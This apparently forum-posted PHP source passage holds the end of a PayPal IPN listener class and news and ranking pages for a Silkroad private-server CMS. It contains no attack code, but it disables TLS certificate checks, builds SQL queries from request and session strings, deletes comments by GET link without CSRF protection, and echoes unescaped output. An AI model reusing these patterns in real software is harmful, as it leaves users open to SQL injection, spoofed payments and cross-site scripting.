     *  If true, an SSL secure connection (port 443) is used for the post back 
     *  as recommended by PayPal. If false, a standard HTTP (port 80) connection
     *  is used. Default true.
     *
     *  @var boolean
     */
    public $use_ssl = true;      
    
    /**
     *  If true, the paypal sandbox URI www.sandbox.paypal.com is used for the
     *  post back. If false, the live URI www.paypal.com is used. Default false.
     *
     *  @var boolean
     */
    public $use_sandbox = false; 
    
    /**
     *  The amount of time, in seconds, to wait for the PayPal server to respond
     *  before timing out. Default 30 seconds.
     *
     *  @var int
     */
    public $timeout = 30;       
    
    private $post_data = array();
    private $post_uri = '';     
    private $response_status = '';
    private $response = '';

    const PAYPAL_HOST = 'www.paypal.com';
    const SANDBOX_HOST = 'www.sandbox.paypal.com';
    
    /**
     *  Post Back Using cURL
     *
     *  Sends the post back to PayPal using the cURL library. Called by
     *  the processIpn() method if the use_curl property is true. Throws an
     *  exception if the post fails. Populates the response, response_status,
     *  and post_uri properties on success.
     *
     *  @param  string  The post data as a URL encoded string
     */
    protected function curlPost($encoded_data) {

        if ($this->use_ssl) {
            $uri = 'https://'.$this->getPaypalHost().'/cgi-bin/webscr';
            $this->post_uri = $uri;
        } else {
            $uri = 'http://'.$this->getPaypalHost().'/cgi-bin/webscr';
            $this->post_uri = $uri;
        }
        
        $ch = curl_init();
        
        curl_setopt($ch, CURLOPT_URL, $uri);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $encoded_data);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, true);
        
        if ($this->force_ssl_v3) {
            curl_setopt($ch, CURLOPT_SSLVERSION, 3);
        }
        
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        
        $this->response = curl_exec($ch);
        $this->response_status = strval(curl_getinfo($ch, CURLINFO_HTTP_CODE));
        
        if ($this->response === false || $this->response_status == '0') {
            $errno = curl_errno($ch);
            $errstr = curl_error($ch);
            throw new Exception("cURL error: [$errno] $errstr");
        }
    }
    
    /**
     *  Post Back Using fsockopen()
     *
     *  Sends the post back to PayPal using the fsockopen() function. Called by
     *  the processIpn() method if the use_curl property is false. Throws an
     *  exception if the post fails. Populates the response, response_status,
     *  and post_uri properties on success.
     *
     *  @param  string  The post data as a URL encoded string
     */
    protected function fsockPost($encoded_data) {
    
        if ($this->use_ssl) {
            $uri = 'ssl://'.$this->getPaypalHost();
            $port = '443';
            $this->post_uri = $uri.'/cgi-bin/webscr';
        } else {
            $uri = $this->getPaypalHost(); // no "http://" in call to fsockopen()
            $port = '80';
            $this->post_uri = 'http://'.$uri.'/cgi-bin/webscr';
        }

        $fp = fsockopen($uri, $port, $errno, $errstr, $this->timeout);
        
        if (!$fp) { 
            // fsockopen error
            throw new Exception("fsockopen error: [$errno] $errstr");
        } 

        $header .= "POST /cgi-bin/webscr HTTP/1.0\r\n";
        $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $header .= "Content-Length: ".strlen($encoded_data)."\r\n";
        $header .= "Connection: Close\r\n\r\n";
        
        fputs($fp, $header.$encoded_data."\r\n\r\n");
        
        while(!feof($fp)) { 
            if (empty($this->response)) {
                // extract HTTP status from first line
                $this->response .= $status = fgets($fp, 1024); 
                $this->response_status = trim(substr($status, 9, 4));
            } else {
                $this->response .= fgets($fp, 1024); 
            }
        } 
        
        fclose($fp);
    }
    
    private function getPaypalHost() {
        if ($this->use_sandbox) return IpnListener::SANDBOX_HOST;
        else return IpnListener::PAYPAL_HOST;
    }
    
    /**
     *  Get POST URI
     *
     *  Returns the URI that was used to send the post back to PayPal. This can
     *  be useful for troubleshooting connection problems. The default URI
     *  would be "ssl://www.sandbox.paypal.com:443/cgi-bin/webscr"
     *
     *  @return string
     */
    public function getPostUri() {
        return $this->post_uri;
    }
    
    /**
     *  Get Response
     *
     *  Returns the entire response from PayPal as a string including all the
     *  HTTP headers.
     *
     *  @return string
     */
    public function getResponse() {
        return $this->response;
    }
    
    /**
     *  Get Response Status
     *
     *  Returns the HTTP response status code from PayPal. This should be "200"
     *  if the post back was successful. 
     *
     *  @return string
     */
    public function getResponseStatus() {
        return $this->response_status;
    }
    
    /**
     *  Get Text Report
     *
     *  Returns a report of the IPN transaction in plain text format. This is
     *  useful in emails to order processors and system administrators. Override
     *  this method in your own class to customize the report.
     *
     *  @return string
     */
    public function getTextReport() {
        
        $r = '';
        
        // date and POST url
        for ($i=0; $i<80; $i++) { $r .= '-'; }
        $r .= "\n[".date('m/d/Y g:i A').'] - '.$this->getPostUri();
        if ($this->use_curl) $r .= " (curl)\n";
        else $r .= " (fsockopen)\n";
        
        // HTTP Response
        for ($i=0; $i<80; $i++) { $r .= '-'; }
        $r .= "\n{$this->getResponse()}\n";
        
        // POST vars
        for ($i=0; $i<80; $i++) { $r .= '-'; }
        $r .= "\n";
        
        foreach ($this->post_data as $key => $value) {
            $r .= str_pad($key, 25)."$value\n";
        }
        $r .= "\n\n";
        
        return $r;
    }
    
    /**
     *  Process IPN
     *
     *  Handles the IPN post back to PayPal and parsing the response. Call this
     *  method from your IPN listener script. Returns true if the response came
     *  back as "VERIFIED", false if the response came back "INVALID", and 
     *  throws an exception if there is an error.
     *
     *  @param array
     *
     *  @return boolean
     */    
    public function processIpn($post_data=null) {

        $encoded_data = 'cmd=_notify-validate';
        
        if ($post_data === null) { 
            // use raw POST data 
            if (!empty($_POST)) {
                $this->post_data = $_POST;
                $encoded_data .= '&'.file_get_contents('php://input');
            } else {
                throw new Exception("No POST data found.");
            }
        } else { 
            // use provided data array
            $this->post_data = $post_data;
            
            foreach ($this->post_data as $key => $value) {
                $encoded_data .= "&$key=".urlencode($value);
            }
        }

        if ($this->use_curl) $this->curlPost($encoded_data); 
        else $this->fsockPost($encoded_data);
        
        if (strpos($this->response_status, '200') === false) {
            throw new Exception("Invalid response status: ".$this->response_status);
        }
        
        if (strpos($this->response, "VERIFIED") !== false) {
            return true;
        } elseif (strpos($this->response, "INVALID") !== false) {
            return false;
        } else {
            throw new Exception("Unexpected response from PayPal.");
        }
    }
    
    /**
     *  Require Post Method
     *
     *  Throws an exception and sets a HTTP 405 response header if the request
     *  method was not POST. 
     */    
    public function requirePostMethod() {
        // require POST requests
        if ($_SERVER['REQUEST_METHOD'] && $_SERVER['REQUEST_METHOD'] != 'POST') {
            header('Allow: POST', true, 405);
            throw new Exception("Invalid HTTP request method.");
        }
    }
}
?>

news

كود PHP:

<?php 
global $core;
if(isset($_GET['del']))
{
    $nCommentID = (int)$_GET['del'];
    $isAdmin = core::$sql -> getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
    
    if(core::$sql -> numRows("select * from srcms_newscomments where id='$nCommentID' and author='$_SESSION[username]'") > 0 || $isAdmin == "admin")
    {
        core::$sql -> exec ("delete from srcms_newscomments where id='$nCommentID'");
        misc::redirect("?pg=news&comment=$_GET[backid]",0);
    }
    else echo "<br/><br/>You can't delete comment that does not belong to you.";
}


if(!isset($_GET['comment']))
{
    $hQuery = core::$sql -> exec("select * from srcms_news order by id desc");
?>

<!-- News -->
<div class="row-fluid purchase margin-bottom-30">
    <div class="container">
        <div class="span8">    
    <?php 
    while($row = mssql_fetch_array($hQuery))
    {    
        $nComments = core::$sql -> numRows("select * from srcms_newscomments where newsID='$row[id]'");
        $szAvatarUrl = user::getUserAvatarUrl($row['author']);
        $dateee = gmDate('Y-m-d H:i:s');
        $nComments = core::$sql -> getRow("select count(*) from srcms_newscomments where newsID='$row[id]'");
        $userRank = core::$sql->getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($row['author'])."'");
        $szUserRank = user::getRankText($userRank);
        $row['content'] =  security::fromHTML($row['content']);
        $row['content'] =  misc::applyAttributesToText($row['content']);
        $datetime = strtotime($row['time']);
        $mssqldate = date("d/m/y", $datetime);?>

<?php if(strtotime($row['time']) > strtotime('last week')) {
    $_NEW = "";
} else {
    $_NEW = "<code>New</code>";
}?>
            <div class="headline">
                <h3>
                    <?php echo $_NEW;?><a href="#" onclick="return false" onmousedown="javascript:toggleSlideBox('NewsID<?php echo $row[id];?>')">
                        <?php echo $row[title];?> <img src="assets/img/expand.png" alt="Toggle" title="Show content" style="position:relative;" />
                    </a> <font size="2">(at <?php echo $mssqldate;?>)</font>
                </h3>
            </div>    
                <small style="display:none;" id="NewsID<?php echo $row[id];?>"><?php echo $row[content];?></small>
                <br />                
<?php 
    }?>
    
            </div>              
    </div>
</div><!--/row-fluid--><!-- End Purchase Block -->
<?php } else {
    $nID = (int)$_GET['comment']; //cast to int .
    if(!isset($_GET['page'])) $_GET['page'] = 1;

    if(core::$sql -> numRows("select * from srcms_news where id='$nID'") > 0)
    {
        $getTitle = core::$sql -> getRow("select title from srcms_news where id='$nID'");?>
        
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-40">
    <div class="container">
        <h1 class="color-green pull-left"><?php echo $getTitle;?></h1>
        <ul class="pull-right breadcrumb">
            <li><a href="/">Home</a> <span class="divider">/</span></li>
            <li><a href="">News</a> <span class="divider">/</span></li>
            <li class="active"><?php echo $getTitle;?></li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->
        
        <?php $hGetComments = core::$sql -> exec("select * from srcms_newscomments where newsID='$nID'");
        
        $commentData = array();
        $a = 0;
        
        while($row = mssql_fetch_array($hGetComments))
        {
            $commentData[$a] = array($row['id'],$row['text'],$row['author'],$row['time']);
            $a++;
        }
        $_GET['page'] = (int)$_GET['page'];
        if(!isset($_GET['page'])) $_GET['page'] = 1;
            for($i = (($_GET['page'] - 1) * 10); $i < (($_GET['page']) * 10);$i++)
            {
                $nCommentID = $commentData[$i][0];
                $szText = $commentData[$i][1];
                $szText = misc::applyAttributesToText($szText);
                $szText = security::fromHTML($szText);
                $szAuthor = $commentData[$i][2];
                $szTime = $commentData[$i][3];
                if(strlen($szText) == 0) break;
                $szAvatar = user::getUserAvatarUrl($szAuthor);
                
                $commentPanelLinks = "";
                
                $isCommentOwner = core::$sql->getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($szAuthor)."'");
                
                $isAdmin = core::$sql -> getRow("select whois from srcms_userprofiles where JID='".user::accountJIDbyUsername($_SESSION['username'])."'");
                
                if($szAuthor == $_SESSION['username'] || $isAdmin == "admin")
                {
                    $commentPanelLinks = "<a href='?pg=news&del=$nCommentID&backid=$nID'><b>Delete</b></a>";
                }
                
                
                $szRank = user::getRankText($isCommentOwner);?>
<div class="media">
    <a class="pull-left" href="#"><img class="media-object" src="<?php echo $szAvatar;?>" alt="<?php echo ucwords($szAuthor);?>"></a>
    <div class="media-body"><h4 class="media-heading"><a href='?pg=viewprofile&username=<?php echo $szAuthor;?>'> <?php echo $szRank; echo" "; echo ucwords($szAuthor);?> </a></h4><?php echo $szText;?><div class="pull-right">Posted at <?php echo $szTime;?> - <?php echo $commentPanelLinks;?></div></div>
</div>
                <hr/>
            <?php }
        

        if($_GET['page'] != 1) echo "<a href='?pg=news&comment=$nID&page=".($_GET['page'] - 1)."'><</a>";
        
        $nPages = 0;
        for($a = 1,$i = 0; $i < count($commentData); $i++)
        {
        if($i % 10 == 0)
        {
            echo "<a href='?pg=news&comment=$nID&page=$a'>$a</a>&nbsp;";
            $a++;
            $nPages++;
        }
        }
        
        if($_GET['page'] < $nPages) echo "<a class='pageblue' href='?pg=news&comment=$nID&page=".($_GET['page'] + 1)."'>></a>";
        
        if(isset($_SESSION['username']))
        {
            if(!isset($_POST['submit']))
            {?>
<br /><form method="post">
    <textarea class="form-control" name="commentText" rows="3" placeholder="Type your message here"></textarea><br>
    <input type="submit" class="btn btn-info" name="submit" value="Submit">
</form>
    <script>CKEDITOR.replace( 'commentText' );</script>
            <?php }
            else
            {

                $cleanText = stripslashes(security::toHTML($_POST['commentText']));
                
                if(strlen($cleanText) < $core -> aConfig['minNewsCommentLen'] || strlen($cleanText) > $core -> aConfig['maxNewsCommentLen'])
                {
                    echo "<br/>Your message is too short or too long. It has to be at least <b>".$core -> aConfig['minNewsCommentLen']."</b> 
                    symbols long, your one is just <b>".strlen($cleanText)."</b> symbols long. Max length is ".$core -> aConfig['maxNewsCommentLen'].".<br/>";
                    misc::back(); 
                }
                else
                {
                $datetime = misc::getDateTime();
                    core::$sql -> exec("insert into srcms_newscomments(newsID, author, text, time) values('$nID','$_SESSION[username]', '$cleanText', '$datetime')");
                    echo "<br/><br/><b>Your comment has been successfully added</b>";
                    misc::redirect("?pg=news&comment=$nID", 1);
                }
            }
        }    else echo "<br/><br/>You must be logged in to post comments";
    }
    else
    echo "<br/>You can't comment news article that doesn't exist.";
}
?>

rank

كود PHP:

<?php
global $core;
switch($_GET['type'])
{

    //Characters Ranking
    
    case('char'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Character Ranking</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Character Ranking</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">  
        <?php if(isset($_GET['name']) && security::isSecureString($_GET['name'], 3))
        {
            $nCharID = char::charIDByCharname($_GET['name']);
            if($nCharID == 0)
            {
                echo "There is no character with such nickname<br/>";
            }
            else
            {
                //main
                //switch to acc db
                $szUsername = user::usernameByCharname($_GET['name']);
                $bCanView = core::$sql -> getRow("select ispublic from srcms_userprofiles where JID='".user::accountJIDbyUsername($szUsername)."'");
                if($bCanView == 1) //DEBUG >= = =
                {
                    //switch to shd db
                    core::$sql -> changeDB("shard");
                    $hGuild = core::$sql -> getRow("select JobType from _CharTrijob where CharID='$nCharID'");
                    $jobType = char::jobTypeByID($hGuild);
                    $hData = core::$sql -> fetchArray("select * from _Char where CharID='$nCharID'");
                    if(strlen($hData['NickName16']) < 2) $hData['NickName16'] = "<b>None</b>";
                    $ownerStr = null;
                    if($core -> aConfig['allowShowCharOwner'] == 1)
                    {
                        $ownerStr = "<a href='?pg=viewprofile&username=$szUsername' class='color-red'>$szUsername</a>";
                    }                
                    #echo $ownerStr;
                         
/*
                         for character gold add this line :
                         
                         <td>Gold</td><td>$hData[RemainGold]</td></tr> 
 */
                    $nGuildName = guild::guildNameByID($hData['GuildID']);
                    $nCharID = char::charIDByCharname($_GET['name']);
                    core::$sql -> changeDB("log");
                    $charstatus = core::$sql -> exec("select top 1 EventID,EventTime from  _LogEventChar where CharID = '$nCharID' order by EventTime DESC");
                    if(core::$sql -> numRows("select top 1 EventID,EventTime from  _LogEventChar where CharID = '$nCharID' order by EventTime DESC") == 0)
                    {
                    $StatusIS = "<img src='img/status/offline.gif' /> Offline";
                    }
                    else
                    {
                    while($row1 = mssql_fetch_array($charstatus))
                    {
                    $charEvent = $row1['EventID'];
                    switch($charEvent)
                    {
                    case 4:
                    $StatusIS = "<img src='img/status/online.gif' /> <b class='color-green'>Online</b>";
                    break;
                    case 6:
                    $StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>";
                    break;
                    default:
                    $StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>";
                    break;
                    }
                    }
                    }
                    core::$sql -> changeDB("acc");
                    //Tiger Girl
                    $uniquetg = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_CH_TIGERWOMAN' ");
                    //Cerburus
                    $uniqueker = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_EU_KERBEROS' ");
                    //IVY
                    $uniqueivy = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_AM_IVY' ");
                    //Uruchi
                    $uniqueuruchi = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_OA_URUCHI' ");
                    //Isy
                    $uniqueisy = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_KK_ISYUTARU' ");
                    //Lord Yarkan
                    $uniquelord = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_TK_BONELORD' ");
                    //Demon
                    $uniquedemon = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_RM_TAHOMET' ");
                    //SOSO
                    $uniquesoso = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_TQ_BLACKSNAKE' ");    

                    $uniquemedusa = core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]' and MobName = 'MOB_TQ_WHITESNAKE' "); /*
Character Info:
<ul class="unstyled">
    <li>Character <i class="icon-user color-green"></i> <b><?php echo $ownerStr;?></b></li>
</ul><img src='img/character/<?php echo $hData[RefObjID];?>.gif' width='75' height="102"> */?>

<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="50%" colspan="2" class="alert alert-error"> <div align="center"><div align="center">Character Info</div></td>
    </tr>
    <tr>
        <td width="50%">Nick</td>
        <td width="50%"><?php echo $hData[CharName16];?></td>
    </tr>
    <tr>
        <td>Guild</td>
        <td><?php echo $nGuildName;?></td>
    </tr>
    <tr>
        <td>Job</td>
        <td><?php echo $jobType;?></td>
    </tr>
    <tr>
        <td>Player Items </td>
        <td><a href='?pg=rank&type=set_char&name=<?php echo $hData[CharName16];?>'><b class='color-green'><?php echo $hData[CharName16];?></b></a></td>
    </tr>
    <?php /*<tr>
        <td>Health points</td>
        <td><span class='color-red'>&nbsp;&nbsp; <?php echo $hData[HP];?> &nbsp;&nbsp;</span></td>
    </tr>
    <tr>
        <td>Mana points</td>
        <td><span class='color-blue'>&nbsp;&nbsp; <?php echo $hData[MP];?> &nbsp;&nbsp;</span></td>
    </tr>
    <tr>
        <td>Job alias</td>
        <td><?php echo $hData[NickName16];?></td>
    </tr>*/?>
    <tr>
        <td>Level</td>
        <td><?php echo $hData[CurLevel];?></td>
    </tr>
    <?php /*<tr>
        <td>Experience</td>
        <td><?php echo $hData[ExpOffset];?></td>
    </tr>*/?>
    <tr>
        <td>Strength</td>
        <td><?php echo $hData[Strength];?></td>
    </tr>
    <tr>
        <td>Intellect</td>
        <td><?php echo $hData[Intellect];?></td>
    </tr>
    <?php /*<tr>
        <td>Skill points</td>
        <td><?php echo $hData[RemainSkillPoint];?></td>
    </tr>
    <tr>
        <td>Free stat points</td>
        <td><?php echo $hData[RemainStatPoint];?></td>
    </tr>
    <tr>
        <td>Berserker</td>
        <td><?php echo $hData[RemainHwanCount];?>/5</td>
    </tr>*/?>
    <tr>
        <td>Player Status</td>
        <td><?php echo $StatusIS;?></td>
    </tr>
    <tr>
        <td>Last Logout</td>
        <td><?php echo $hData[LastLogout];?></td>
    </tr>
</table>
<br />
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="50%" colspan="2" class="alert alert-error"> <div align="center">Unique Kills (<b class="color-green">No Titans</b>)</div></td>
    <tr>
        <td width="50%">Tiger Girl Kills</td>
        <td width="50%"><?php echo $uniquetg;?></td>
    </tr>
    <tr>
        <td>Cerberus Kills</td>
        <td><?php echo $uniqueker;?></td>
    </tr>
    <tr>
        <td>Captain Ivy</td>
        <td><?php echo $uniqueivy;?></td>
    </tr>
    <tr>
        <td>Uruchi</td>
        <td><?php echo $uniqueuruchi;?></td>
    </tr>
    <tr>
        <td>Isyutaru</td>
        <td><?php echo $uniqueisy;?></td>
    </tr>
    <tr>
        <td>Lord Yarkan</td>
        <td><?php echo $uniquelord;?></td>
    </tr>
    <tr>
        <td>Demon Shaitan</td>
        <td><?php echo $uniquedemon;?></td>
    </tr>
    <tr>
        <td>SoSo The Black Viper</td>
        <td><?php echo $uniquesoso;?></td>
    </tr>
    <tr>
        <td>BeakYung The White Viper (Medusa)</td
        ><td><?php echo $uniquemedusa;?></td>
    </tr>
</table>
            <?php core::$sql -> changeDB('acc');
            if(core::$sql -> numRows("select * from Evangelion_uniques where CharName='$hData[CharName16]'") == 0)
            {
            echo "This character has no uniques kills!";
            }
            else
            {?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="50%" colspan="2" class="alert alert-error"> <div align="center">Latest Unique Kills by (<b class="color-green"><?php echo $hData[CharName16];?></b>)</div></td>
    </tr>
        <td width="50%"><b>Unique name</b></td>
        <td width="50%"><b>Time</b></td>    
    <tr>
            <?php $hQuery = core::$sql -> exec("select top 30 * from Evangelion_uniques where CharName='$hData[CharName16]' order by time desc");
            while($row = mssql_fetch_array($hQuery))
            {
                $datetime1 = strtotime($row['time']);
                $mssqldate1 = date("d-m-y", $datetime1);
                echo "<tr>";
                $UniqueType = $row['MobName'];
                switch($UniqueType) {
                // Tiger Girl
                case "MOB_CH_TIGERWOMAN":
                echo '<td>Tiger Girl</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_CH_TIGERWOMAN_L3":
                echo '<td>Tiger Girl (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                // XXX
                case "MOB_OA_URUCHI":
                echo '<td>Uruchi</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_KK_ISYUTARU":
                echo '<td>Isyutaru</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_TK_BONELORD":
                echo '<td>Lord Yarkan</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_EU_KERBEROS":
                echo '<td>Cerberus</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_AM_IVY":
                echo '<td>Captain Ivy</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_RM_TAHOMET":
                echo '<td>Demon Shaitan</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_KK_ISYUTARU_L3":
                echo '<td>Isyutaru (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_TK_BONELORD_L3":
                echo '<td>Lord Yarkan (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_RM_TAHOMET_L3":
                echo '<td>Demon Shaitan (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_EU_KERBEROS_L3":
                echo '<td>Cerberus (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_AM_IVY_L3":
                echo '<td>Captain Ivy (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_OA_URUCHI_L3":
                echo '<td>Uruchi (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                case "MOB_TQ_BLACKSNAKE_L3":
                echo '<td>SoSo The Hades Viper (Titan)</td><td>'.$mssqldate1.'</td>';
                break;
                default:
                break;
                }
                echo "</tr>";
            }?>
</table>

            <?php core::$sql -> changeDB('shard');
            }
            #misc::back();
            } else echo "Owner of account on which this character is created didn't want you to view he's (her) data.<br/>";
            }
            } 
            else 
            {
            core::$sql -> changeDB("shard");
            $hQuery = core::$sql -> exec("select top 50 * from _Char where CharName16 not like '%[GM]%' order by CurLevel desc");?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width='10%' align='center' class='thead'><b>#</b></td>
        <td width='10%' align='center' class='thead'><b>Race</b></td>
        <td width='30%' align='center' class='thead'><b>Charname</b></td>
        <td width='20%' align='center' class='thead'><b>Level</b></td>
        <!--td width='15%' align='center' class='thead'><b>SP</td-->
        <td width='15%' align='center' class='thead'><b>Strength</b></td>
        <td width='15%' align='center' class='thead'><b>Intellect</b></td>
    </tr>
            <?php $n = 1;
            while($row = mssql_fetch_array($hQuery))
            {
                
                $szUsername = user::usernameByCharname($row['CharName16']);
                $bCanView = core::$sql -> getRow("select ispublic from srcms_userprofiles where JID='".user::accountJIDbyUsername($szUsername)."'");
                if($bCanView > 0)
                {
                    
                $icon = "";
                    if($row['RefObjID'] < 3000) $icon = "<img src='img/Character/race_china.png'>";
                    else $icon="<img src='img/Character/race_euro.png'>";?>
    <tr>
        <td align='center'><b><?php echo $n;?></b></td>
        <td align='center'><?php echo $icon;?></td>
        <td align='center'><a href='?pg=rank&type=char&name=<?php echo $row[CharName16];?>'><b class="color-green"><?php echo $row[CharName16];?></b></a></td>
        <td align='center'><?php echo $row[CurLevel];?></td>
        <?php /*<td align='center'><?php echo $row[RemainSkillPoint];?></td> */ ?>
        <td align='center'><?php echo $row[Strength];?></td>
        <td align='center'><?php echo $row[Intellect];?></td>
    </tr>
                    <?php $n++;
                }
            }?>
</table>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
        <?php }
    }
    break;
    
    //Search Character Script.
    
    case('search_char'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Search Character</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Search Character</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <?php if(!isset($_POST['searchfor']))
        {?>
<form method='post' class="reg-page">
Max results: 50!<br />
    Charname: <input type='text' name='searchfor' maxlength='16' placeholder='Search Character'>
<br />
    <input type='submit' name='submit' value='Search' class="btn-u" >
</form>
        <?php }
        else
        {
            $bExit = false;
            if(!security::isSecureString($_POST['searchfor'], 3))
            {
                $bExit = true;?>
        <span class="alert alert-error">Character name contains forbidden symbols!</span>
        <?php }
            if(strlen($_POST['searchfor']) == 0)
            {
                $bExit = true;?>
        <span class="alert alert-error">Character name can't be 0 symbols long!</span>
        <?php }
            if(strlen($_POST['searchfor']) > 16)
            {
                $bExit = true;?>
        <span class="alert alert-error">Character name too long!</span>
        <?php }
            
            if(!$bExit)
            {
                echo "<br />";
                core::$sql -> changeDB('shard');
                $hQuery = core::$sql -> exec("select top 50 * from _Char where CharName16 like '%$_POST[searchfor]%'");
                $nResults = 0;?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>Char name</td>
    </tr>
                <?php while($row = mssql_fetch_array($hQuery))
                {?>
    <tr>
        <td><a href='?pg=rank&type=char&name=<?php echo $row[CharName16];?>'><b class="color-green"><?php echo $row[CharName16];?></b></a></td>
    </tr>
                    <?php $nResults++;
                }?>
</table>
                <?php if($nResults > 0) 
                {?>
                <br /><div class="pull-left">Found [<b class="color-green"><?php echo $nResults;?></b>] characters!</div><br />
                <div class="pull-right"><?php echo misc::back();?></div><br />
</table>
                <?php }
                else echo '<div class="pull-left"> No characters found </div><br /><br /><br />';
            }
        }
        #echo "<br /><br />";
        #misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
    <?php }
    break;
    
    //Search Guild System
    
    case('search_guild'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Search Guild</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Search Guild</li>
        </ul>
    </div><!--/container-->
</div><!--/breadcrumbs-->
<!--=== End Breadcrumbs ===-->

<!--=== Content Part ===-->
<div class="container">        
    <div class="row-fluid">
        <?php core::$sql -> changeDB('shard');
        if(!isset($_POST['search_for']))
        {?>

<form method='post' class="reg-page"> 
    Guild name: <input type='text' name='search_for' maxlength='16' placeholder='Search Guild'><br />
    <input type='submit' name='submit' value='Search' class="btn-u" >
</form>
        <?php }
        else
        {    
            $bExit = false;
            if(!security::isSecureString($_POST['search_for'], 3))
            {
                $bExit = true;?>
        <span class="alert alert-error">Guild name contains forbidden symbols !</span>
        <?php }
            
            if(strlen($_POST['search_for']) == 0)
            {
                $bExit = true;?>
        <span class="alert alert-error">Guild name length can't be 0</span>
        <?php }
            
            if(strlen($_POST['search_for']) > 16)
            {
                $bExit = true;?>
        <span class="alert alert-error">Guild name too long</span>
        <?php }
            
            if(!$bExit)
            {
                core::$sql -> changeDB('shard');
                
                $hQuery = core::$sql -> exec("select top 50 * from _Guild where Name like '%$_POST[search_for]%'");
                
                if($nResults = mssql_num_rows($hQuery) > 0)
                {?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td>Guild name</td>
    </tr>
                        <?php while($row = mssql_fetch_array($hQuery))
                        {?>
    <tr>
        <td><a href='?pg=rank&type=guild&name=<?php echo $row[Name];?>'><b class="color-green"><?php echo $row[Name];?></b></a></td>
    </tr>
                        <?php }?>
</table>
<br /><br />Total results: [<b class="color-green"><?php echo $nResults;?></b>]<br />
<div class="pull-right"><?php echo misc::back();?></div><br />
                <?php }
                else echo "No results!<br /><br />";
            }
        }
        #echo "<br /><br />";
        #misc::back();?>
    </div><!--/row-fluid-->
</div><!--/container-->        
<!--=== End Content Part ===-->
    <?php
    }
    break;
    
    //Guilds Ranking
    
    case('guild'):
    {?>
<!--=== Breadcrumbs ===-->
<div class="breadcrumbs margin-bottom-30">
    <div class="container">
        <h1 class="color-green pull-left">Guild Ranking</h1>
        <ul class="pull-right breadcrumb">
            <li><a href="?pg=Home">Home</a> <span class="divider">/</span></li>
            <li><a href="">Pages</a> <span class="divider">/</span></li>
            <li class="active">Guild Ranking</li>
        </ul>
    </div><!--/container-->
